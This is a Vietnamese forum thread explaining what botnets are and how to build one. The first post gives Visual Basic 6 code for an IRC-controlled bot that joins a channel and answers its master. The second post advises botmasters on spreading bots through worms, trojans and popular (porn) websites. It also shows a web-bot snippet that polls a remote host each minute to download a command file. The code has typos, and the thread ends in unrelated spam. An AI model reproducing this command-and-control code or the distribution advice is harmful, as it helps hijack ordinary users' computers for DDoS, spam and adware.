Tìm hiểu về Botnet là gì? Kiến thức cơ bản về botnet

loveIT

Thành viên Vip
Botnet?
I.Botnet là gì?

Botnet là một mạng gồm từ hàng trăm tới hàng triệu máy tính bị điều khiển hoàn toàn (theo thuật ngữ người ta gọi các máy tính này là Zombie tức các thây ma),chúng bị điều khiển để cùng làm một công việc gì đó theo mục đích của hacker điều khiển chúng vd: tải về cài đặt các chương trình quảng cáo, hay cùng đồng loạt tấn công một trang web nào đó thông qua kĩ thuật DDoS

II.Mạng BotNet đc tạo nên bởi gì ?

Nền tảng của BotNet là một chương trình máy tính đc thiết kế để liên lạc với hacker ,nhận lệnh và thực hiện lệnh của hacker, người ra gọi chương trình này là “Bot” (viết tắt từ robot).

III.Các con bot liên lạc với hacker bằng gì?

Kể từ những phiên bản đầu tiên các bot đã đc thiết kế để nhận lệnh thông qua các IRC server tức các máy chủ Internet Relay Chat một dạng máy chủ chạy dịch vụ chat công cộng (thường các máy chủ này là các máy chủ thuộc họ *nix ) để nhận đc lệnh từ hacker một cách nhanh nhất.

IV.Vậy các con bot đã dùng các server IRC như thế nào ?

Các máy chủ chạy dịch vụ IRC thường lắng nghe trên port 6667 ( một port cao ).Và các chương trình IRC server sử dụng một tập các chỉ thị gọi là lệnh IRC ( IRC commands )

Các bot thực hiện việc tạo một kết nối ( connection ) thông qua giao thức TCP/IP đến port 6667 của máy chủ IRC rồi sau đó dùng tập lệnh IRC để gửi và nhận các tin nhắn tới hacker.

V.Vậy các bot làm thế nào để có thể đc cài vào máy của người sử dụng bình thường ( Normal User ) ?

Các Bot đều có tính năng đầy đủ của một trojan và sự kết hợp nhuần nhuyễn từ virus vì vậy các con bot đều có thể tự lây lan thông qua các lỗ hổng của hệ điều hành và chiếm quyền điều khiển máy của “người dùng bình thường”.Ngoài ra một số bot không đc tích hợp tính năng lây lan nên nó cần đc sự hộ tống của một virus ( đây chính là dạng lây lan phổ biến của các bot hiện nay )

VI.Cách tạo một con “Bot”:

Với ví dụ này VNIT sẽ dùng ngôn ngữ lập trình Visual Basic để minh họa vì ngôn ngữ này đc nhiều người sử dụng nếu có thời gian VNIT sẽ post thêm bài viết về cách viết bot trên nền ngôn ngữ C++

Con bot này sẽ có tính năng cơ bản là kết nối tới server IRC và trả lời khi hacker hỏi “LiveOrNot”


1.Điều đầu tiên mà bạn phải học là tập lệnh IRC:


Tập lệnh IRC sẽ có sự khác biệt đôi chút khi nó chạy trên các chương trình quản lý IRC server khác nhau


USER <Real Name> là lệnh thiết lập tên thật cho bot khi nó vào IRC server
NICK <NickName> là lệnh thiết lập nick name cho bot
JOIN <Channel> là lệnh cho bot truy cập vào một "kênh" (channel),channel tương tự như một room chat vậy
PRIVMSG <Channel> : <Message> là lệnh gửi tin nhắn tới hacker



2.Một số Sub chính cho bot:
Khai báo hằng và biến:


onst Server As String = "irc.datviet.net" 'tên channel
Const Port As Integer = 23 'port
Const Channel As String = "NoHat" 'Kênh mà bot sẽ chui vào
Dim Nick As String 'Nick của bot





Bạn tạo môt Form mới và kéo thả vào đó thành phần WinSock đặt thuộc tính name là ws




Private Sub Form_Load() ws.Connect Server, Port 'Tạo một kết nối tới server IRC
Nick = "Tester" & LTrim(RTrim(Str(Int(Rnd * 100))))
End Sub

Sub thực hiện việc gời command sau khi kết nối hoàn thành


Private Sub ws_Connect()
Dim UserName, RealName As String
UserName = Nick
RealName = Nick
ws.SendData "USER " & UserName & " 0 * " & RealName & vbCrLf
ws.SendData "NICK " & Nick & vbCrLf
ws.SendData "JOIN " & Channel & vbCrLf
ws.SendData "PRIVMSG " & Channel & ":" & " Bot chao master" & vbCrLf
End Sub

Sub đáp trả khi bot nhận đc lệnh


Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
Dim Pos As Integer
Dim Master As String
ws.GetData strData
DoEvents


If InStr(strData, "liveornot") <> 0 Then
Pos = InStr(1, strData, "!")
Master = Mid(strData, 2, Pos - 2)
ws.SendData Replace(strData, "liveornot", "Live") & vbCrLf
ws.SendData "PRIVMSG " & Master & " " & Replace(strData, "liveornot", "Live") & vbCrLf
End If
EndSub


VII.Điều khiển bot thế nào ?

Để điều khiển bot bạn hãy cho chạy thử con bot trên để làm ví dụ
Sau đó bật một chương trình IRC Client nào đó ví dụ mIRC
Rồi kết nối vào máy server là irc.datviet.net với port 23 ( đáng nhẽ là port 6667 nhưng không hiểu sao đa phần các IRC server của Việt Nam lại dùng port 23 ?! ) với một nick tùy ý
gõ lệnh:

/JOIN NoHat (phải có dấu "/" vì mIRC .... bắt phải thế chứ IRC server không bắt thế đâu )


là bạn đã có mặt trong cùng channel với bot của bạn
sau đó hãy gõ lệnh

LiveOrNot (chú ý viết hoa y chang nếu không con bot nó ngu ra mặt :D )

Con bot sẽ trả lời bạn rằng


Sưu tập
 

loveIT

Thành viên Vip
Kiến thức cơ bản về botnet
Các chương ;
A – các định nghĩa
B- Phát tán bot như thế nào
C – Phân tích một bot
1, a,b,c định nghĩa :
A – Botnet là gì : là những chương trình tương tự Trojan backdoor cho phép kẻ tấn công sử dụng máy của họ như là những Zoombie ( máy tính thây ma – máy tính bị chiếm quyền điều khiển hoàn toàn ) v à chúng chủ động kết nối với một Server để dễ dàng điều khiển , các bạn lưu ý chữ “chủ động” đó là một đặc điểm khác của bot so với trojan backdoor . Chính vì sự chủ động này mà máy tính bị cài đặt chúng kết nối trở nên chậm chạp , một đặc điểm giúp ta dễ dàng nhận diện bot .


B – tại sao gọi là mạng botnet : mạng botnet là một mạng rất lớn gồm hàng trăm hàng ngàn máy tính Zombie kết nối với một máy chủ mIRC ( Internet Replay Chat )
hoặc qua các máy chủ DNS để nhận lệnh từ hacker một cách nhanh nhất . Các mạng bot gồm hàng ngàn “thành viên” là một công cụ lý tưởng cho các cuộc chiến tranh đọ máu như DDOS , spam, cài đặt các chương trình quảng cáo …..


C – mIRC hay DNS :
- mIRC là một hình thức chat có trước yahoo meseger trước đây thường được các botmaster sử dụng riêng tôi thì tôi thích sử dụng các bot chạy trên nền web hơn (
DNS - Domain Name Server ) - vì ngay cả khi ta online hay offline thì chúng vẫn hoạt động
– dễ dàng điều khiển phù hợp với điều kiện VN .


- Note :
trước đây do bot luôn có khả năng lây lan nên còn được gọi là BOTNET – WORM nhưng hiện nay chức năng này được gỡ bỏ vì hai lý do sau
+ Bot dễ bị lộ : Trong khi mục tiêu của botmaster là phục kích lâu dài
+ Kích thước của worm lớn dễ bị Fire Wall chặn dễ phát hiện khó lây lan , =>bot thường được tải xuống bởi 1 chú worm hoặc nguỵ trang bằng một trojan tuỳ theo trình độ , tư duy của botmaster .
=> Theo tôi worm và botnet nên tách rời nhau ra
B- Phát tán bot như thế nào
Các botmaster thường phát tán bot theo những cách như sau
1-Sử dụng một con worm tải bot xuống và kích hoạt chúng (ta đã biết là worm lây lan rất mạnh )
2- Gắn bot vào một trojan nói theo cách dễ hiểu nhất là gửi các chương trình bị lây nhiễm bởi bot cho các nạn nhân và tự họ sẽ kích hoạt chúng
3 - Gắn nó lên một trang web nhiều người truy câpj ( thường là các trang web sex :X vì số lượng người tham gia rất lớn )
4- Kết hợp các 1 với 2 hoặc 4 (gắn worm vào trojan hoặc web)
Chú ý : cách lây lan thứ 3 là hay nhất ( tuy có gian hung một chút )vì với cách thứ nhất là dung worm thì rất dễ bị lộ cách thứ 3 thì ko được nhiều , cách thứ 4 thì tạm được
C – Phân loại bot
- Theo cách điêur khỉên botnet được chia làm hai loại
+ DNS Bot : điều khiển qua nền web, nguyên tắc hoạt động như sau : đầu tiên tại host điều khiển botmaster sẽ tại một tệp lệnh.txt sau đó bot sẽ download tệp này, tiến hành phân tích và thực hiện yêu cấu của người viết.
-Ưu đỉêm : Thực hiện dễ dàng viết và điều khỉên đơn giản chỉ cần một host bất kỳ là có thể điều khiển được , bot thực hiện lệnh được công việc ngay cả khi chủ bot online hay offline .
-Nhược đỉêm : tốc độ xử lý chậm (do phải mất công cho cả download và upload ) – không có sự trao đổi qua lại giữa chủ bot và zombie .
+ mIRC : điều khiển qua các mạng chat mIRC : ta đã biết là tại hình thức chat Internet Replay Chat, một chương trình có thể tuỳ ý đăng ký và sử dụng một nick name mà không cần phải đăng ký , lợi dụng lỗ hổng này bot mIRC sử dụng chúng để hoạt đông .Nguyên tắc như sau : bot sẽ sử dụng winsock gửi các tệp lệnh IRC để nhận lệnh từ hacker qua một port đã định sẵn khi cấu hình bot cần lưu ý đến Chanel ( gọi tắt là Chan), Port (mặc đinh là 6667), máy chủ Mirc ( thường mở đầu bằng irc.)
- Các bạn có thể tham khảo vấn đề này kỹ hơn tại
www.ryan1918.com
trang web hang đầu về botnet .
D - Mổ xẻ một bot
Trong bài này vì kiến thức có hạn tôi sẽ chỉ phân tích 1 bot chạy trên nền web có tên là vnbot được viết bằng ngôn ngữ visual basic 6.0 để các bạn hiểu them


đầu tiên là phân tích hàm API sau


Khai báo :


Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long


Đây là một hàm API sử dụng thư viện hàm của windows


Xử dụng
‘tạ tạo một timer với tên mặc định là timer1 và thuộc tính interval là 60000 (tương đương ‘1 phút )
‘trong sự kiện timer nhập đoạn mã sau vào


Timer1_Timer ()
Call URLDownloadToFile(0&, “http://ww.hótban.com/host.txt”, “C:\test.txt”, &H10, 0&)
‘hàm này có tác dụng là download tệp lệnh về đoạn mã sau có tác dụng đọc chương trình ‘cần chạy


open “c:\test.txt” for input as #1 ‘ Mo theo che do chi doc – Tai cong là #1
line input #1, id ‘ Doc dong dau tien
msgbox id ‘ hien thi ket qua
close #1
‘đóng lại
End sub
‘Ket thuc
2 đoạn mã này có tác dụng đọc và hiển thị kết quả chúng ta mong muốn thông qua net .
Trích: HVA​
 
xây nhà trọn gói tại quảng ngãi xây nhà trọn gói quảng ngãi xây nhà trọn gói tại quảng ngãi nội thất quảng ngãi
Top